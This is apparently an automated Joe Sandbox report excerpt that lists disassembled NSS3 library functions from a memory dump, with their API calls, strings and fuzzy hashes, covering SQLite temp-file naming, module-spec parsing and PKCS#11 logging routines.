Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeab2d074a804a22ea122a00a2d77b720689aaa3546932ef11963255b890d9a4
Instruction ID: ed5bd0cc42c150d9ca0fa2e1378b917b4e7014fcca2cf0e64382af6801664473
Opcode Fuzzy Hash: eeab2d074a804a22ea122a00a2d77b720689aaa3546932ef11963255b890d9a4
Instruction Fuzzy Hash: 5D11C132A002158BD704CF25E884F5AB7B6FF4231CF08426AD8168FA41E775D896C7C1

Function 6CD70C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeecdd31c2b2bf2b704e393072b35f49759b32d556ec496277e2e502ffcaf716
Instruction ID: 17e4f5aa30a615fa4f7fe328e5b25a9b51e9df4b0096b4a020b8afc580481adf
Opcode Fuzzy Hash: aeecdd31c2b2bf2b704e393072b35f49759b32d556ec496277e2e502ffcaf716
Instruction Fuzzy Hash: 9D11C174704305CFDB10DF28D88066A77B6FF853A8F14806DD8198B751EB32E906CBA0

Function 6CD70D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 3963e662b78942cfcfaa8ad47e0683a2bb63611140a2ebdf5790fed63ef06bc8
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 79E0923A212264A7DB248F09C550BA97359DF81659FB9807DCC5D9FE81E733F80387A1

Function 6CC9CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef50acd93ead84e7568ef3f90f499be68f081181839c6dedb1612ccf6e28692
Instruction ID: d2f1c6833f8af50862827785a418317c2ed69ed3d149ae304db5646dec1ece64
Opcode Fuzzy Hash: 5ef50acd93ead84e7568ef3f90f499be68f081181839c6dedb1612ccf6e28692
Instruction Fuzzy Hash: FEC04838244608CFC704DA48E589AA43BB9AB09610B040099EA028B721DB22F810CA81

Function 6CD76E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC2CA30: EnterCriticalSection.KERNEL32(?,?,?,6CC8F9C9,?,6CC8F4DA,6CC8F9C9,?,?,6CC5369A), ref: 6CC2CA7A
Part of subcall function 6CC2CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CC2CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CC3BE66), ref: 6CD76E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CC3BE66), ref: 6CD76E98
sqlite3_snprintf.NSS3(?,00000000,6CDDAAF9,?,?,?,?,?,?,6CC3BE66), ref: 6CD76EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CC3BE66), ref: 6CD76ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CC3BE66), ref: 6CD76EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD76F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD76F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD76F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CC3BE66), ref: 6CD76FA6
sqlite3_snprintf.NSS3(?,00000000,6CDDAAF9,00000000,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD76FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD76FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD76FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD77014
sqlite3_free.NSS3(00000000,?,?,?,?,6CC3BE66), ref: 6CD7701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CC3BE66), ref: 6CD77030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD7705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CC3BE66), ref: 6CD77079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD77097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CC3BE66), ref: 6CD770A0

Strings

winGetTempname2, xrefs: 6CD770C4
mz_etilqs_, xrefs: 6CD76F18
winGetTempname1, xrefs: 6CD7708F
winGetTempname4, xrefs: 6CD77046
winGetTempname5, xrefs: 6CD77071

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: c3147a292f1b4938da82103123a937889129bff9afec822daf91292014c13ed7
Instruction ID: 799f50d42cf2ff60a2b31d9793d5e1ea4f57e515d51c23fcbef56849f6fedae6
Opcode Fuzzy Hash: c3147a292f1b4938da82103123a937889129bff9afec822daf91292014c13ed7
Instruction Fuzzy Hash: 465169B1F002116BF32157309C55FBF36669B82318F144938E85597BE1FB39A51E82F2

Function 6CD04FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCB75C2,00000000,00000000,00000001), ref: 6CD05009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCB75C2,00000000), ref: 6CD05049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD0505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CD05071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD05089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD050A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CD050B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCB75C2), ref: 6CD050CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD050D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD050F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD05103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD0511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD0512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD05145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD05153
free.MOZGLUE(?), ref: 6CD0516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CD0517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD05195

Strings

library=, xrefs: 6CD05043
name=, xrefs: 6CD05057
nss=, xrefs: 6CD05083
config=, xrefs: 6CD0509B
parameters=, xrefs: 6CD0506B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: d4fd036e107d71434b2d20d61cceda40567918f92303dc9673972c4dd0ec0597
Instruction ID: b5db48a9bd705de60d039bd80aada77203f0c2f69e3bf321e289a3c725bd6699
Opcode Fuzzy Hash: d4fd036e107d71434b2d20d61cceda40567918f92303dc9673972c4dd0ec0597
Instruction Fuzzy Hash: D951CBB5F01205ABEB10DF28DC41AAF37A8AF05248F140061ED55E7B52F725E929C7F6

Function 6CCD8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6CCD8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCD8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD8EB3

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCD8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CCD8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CCD8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD8F29
PR_LogPrint.NSS3(?,00000000), ref: 6CCD8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CCD8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCD8F80
PR_LogPrint.NSS3(?,00000000), ref: 6CCD8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CCD8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CCD8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CCD9047

Strings

*pulWrappedKeyLen = 0x%x, xrefs: 6CCD9042
pulWrappedKeyLen = 0x%p, xrefs: 6CCD8FC8
hSession = 0x%x, xrefs: 6CCD8E8E, 6CCD8E9E
C_WrapKey, xrefs: 6CCD8E71
hKey = 0x%x, xrefs: 6CCD8F5B, 6CCD8F6B
hWrappingKey = 0x%x, xrefs: 6CCD8F01, 6CCD8F11
pWrappedKey = 0x%p, xrefs: 6CCD8FAD
(CK_INVALID_HANDLE), xrefs: 6CCD8EAC, 6CCD8F1F, 6CCD8F79
pMechanism = 0x%p, xrefs: 6CCD8EE0

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: afc975acbeb62a6289be704a0b7f590e2f8585e3964f1ed19aac5dc812569de0
Instruction ID: 52c3f62fc65c602ff1b9e540c5b15e4025b1c22c18f822c88c0dc98b3776ee82
Opcode Fuzzy Hash: afc975acbeb62a6289be704a0b7f590e2f8585e3964f1ed19aac5dc812569de0
Instruction Fuzzy Hash: 8951D875B01105AFEB019F44DD48F9A77B6EB4231CF094069F6096BA22E731F918CBE2

Function 6CD04C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CCF4F51,00000000), ref: 6CD04C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CCF4F51,00000000), ref: 6CD04C5B
PR_smprintf.NSS3(6CDDAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CCF4F51,00000000), ref: 6CD04C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CCF4F51,00000000), ref: 6CD04CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CD04CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CD04CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CD04D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CCF4F51,00000000), ref: 6CD04D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CCF4F51,00000000), ref: 6CD04D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CD04D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CD04DA2
free.MOZGLUE(?), ref: 6CD04DB9
free.MOZGLUE(00000000), ref: 6CD04DCF

Strings

every, xrefs: 6CD04CA1
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CD04D9D
slotFlags, xrefs: 6CD04D34
rust, xrefs: 6CD04D22
%s,%s, xrefs: 6CD04C4B
any, xrefs: 6CD04C96
0x%08lx=[%s %s], xrefs: 6CD04D80
ootT, xrefs: 6CD04D1A
timeout, xrefs: 6CD04C91
rootFlags, xrefs: 6CD04D47

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 9681c15c30da6b70d271b4cde0fe8b0791839908d5eef97459deee01f0477b12
Instruction ID: c5e85882ed069366053571890f67d37a4020103ff8eed4e0ac0e5c25db027cf3
Opcode Fuzzy Hash: 9681c15c30da6b70d271b4cde0fe8b0791839908d5eef97459deee01f0477b12
Instruction Fuzzy Hash: 17415FB1E00141A7EB115F1C9C84EBB3A69AFA234CF194124E8195BB61E731F924C7F3

Function 6CCE2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CCE2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CCE2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CCE2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CCE2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CCB4F1C,?,-00000001,00000000,?), ref: 6CCE2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CCB4F1C,?,-00000001,00000000), ref: 6CCE2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CCE2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CCE2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CCE2EF8
PR_Unlock.NSS3(?), ref: 6CCE2F62
TlsGetValue.KERNEL32 ref: 6CCE2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CCE2F9E
PR_Unlock.NSS3(?), ref: 6CCE2FCA
TlsGetValue.KERNEL32 ref: 6CCE301A
EnterCriticalSection.KERNEL32(?), ref: 6CCE302E
PR_Unlock.NSS3(?), ref: 6CCE3066
PR_SetError.NSS3(00000000,00000000), ref: 6CCE3085
PR_Unlock.NSS3(?), ref: 6CCE30EC
TlsGetValue.KERNEL32 ref: 6CCE310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CCE3124
PR_Unlock.NSS3(?), ref: 6CCE314C

Part of subcall function 6CCC9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CCF379E,?,6CCC9568,00000000,?,6CCF379E,?,00000001,?), ref: 6CCC918D
Part of subcall function 6CCC9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CCF379E,?,6CCC9568,00000000,?,6CCF379E,?,00000001,?), ref: 6CCC91A0

Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907AD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907CD
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CC2204A), ref: 6CC907D6
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CC2204A), ref: 6CC907E4
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,6CC2204A), ref: 6CC90864
Part of subcall function 6CC907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CC90880
Part of subcall function 6CC907A0: TlsSetValue.KERNEL32(00000000,?,?,6CC2204A), ref: 6CC908CB
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908D7
Part of subcall function 6CC907A0: TlsGetValue.KERNEL32(?,?,6CC2204A), ref: 6CC908FB

PR_SetError.NSS3(00000000,00000000), ref: 6CCE316D

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 0f5600ba7e031003a2e813cdc0d1fea2fac5d38453786e31f3b9ce0218b1f458
Instruction ID: eaaa74dd19c1e498ad8ba0eeedb41a01cda8c4c2685c948c6a57f487eb65aef4
Opcode Fuzzy Hash: 0f5600ba7e031003a2e813cdc0d1fea2fac5d38453786e31f3b9ce0218b1f458
Instruction Fuzzy Hash: EFF190B5E002199FEF00DFA4D844B99BBB8FF0A318F184169ED04A7721E731E995CB91

Function 6CCDAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6CCDAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CCDAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CCDAF83

Part of subcall function 6CDBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CDBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CCDAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CCDAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CCDAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CCDAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CCDB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CCDB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6CCDB041

Strings

hSession = 0x%x, xrefs: 6CCDAF5E, 6CCDAF6E
pSignature = 0x%p, xrefs: 6CCDB023
pulSignatureLen = 0x%p, xrefs: 6CCDB03C
pParameter = 0x%p, xrefs: 6CCDAFB9
C_SignMessage, xrefs: 6CCDAF41
ulParameterLen = 0x%p, xrefs: 6CCDAFD4
pData = 0x%p, xrefs: 6CCDAFEF
ulDataLen = %d, xrefs: 6CCDB00A
(CK_INVALID_HANDLE), xrefs: 6CCDAF7C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 386987084753cf2f1c615036acfc5a25c2d5b23ff5621f4234f421d66ece7ebb
Instruction ID: da6255dcccfdb4b0491ac158701c27228c4260611a1cc62261d9703d8aa24d68
Opcode Fuzzy Hash: 386987084753cf2f1c615036acfc5a25c2d5b23ff5621f4234f421d66ece7ebb
Instruction Fuzzy Hash: DB41E7B6701145AFEB00CF54DD48F897BB5EB4231DF494068F60867A62E731E868CBE2

Function 6CCE6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCE6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CCE6943
Part of subcall function 6CCE6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CCE6957
Part of subcall function 6CCE6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CCE6972
Part of subcall function 6CCE6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CCE6983
Part of subcall function 6CCE6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CCE69AA
Part of subcall function 6CCE6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CCE69BE
Part of subcall function 6CCE6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CCE69D2
Part of subcall function 6CCE6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CCE69DF
Part of subcall function 6CCE6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CCE6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CCE6D8C
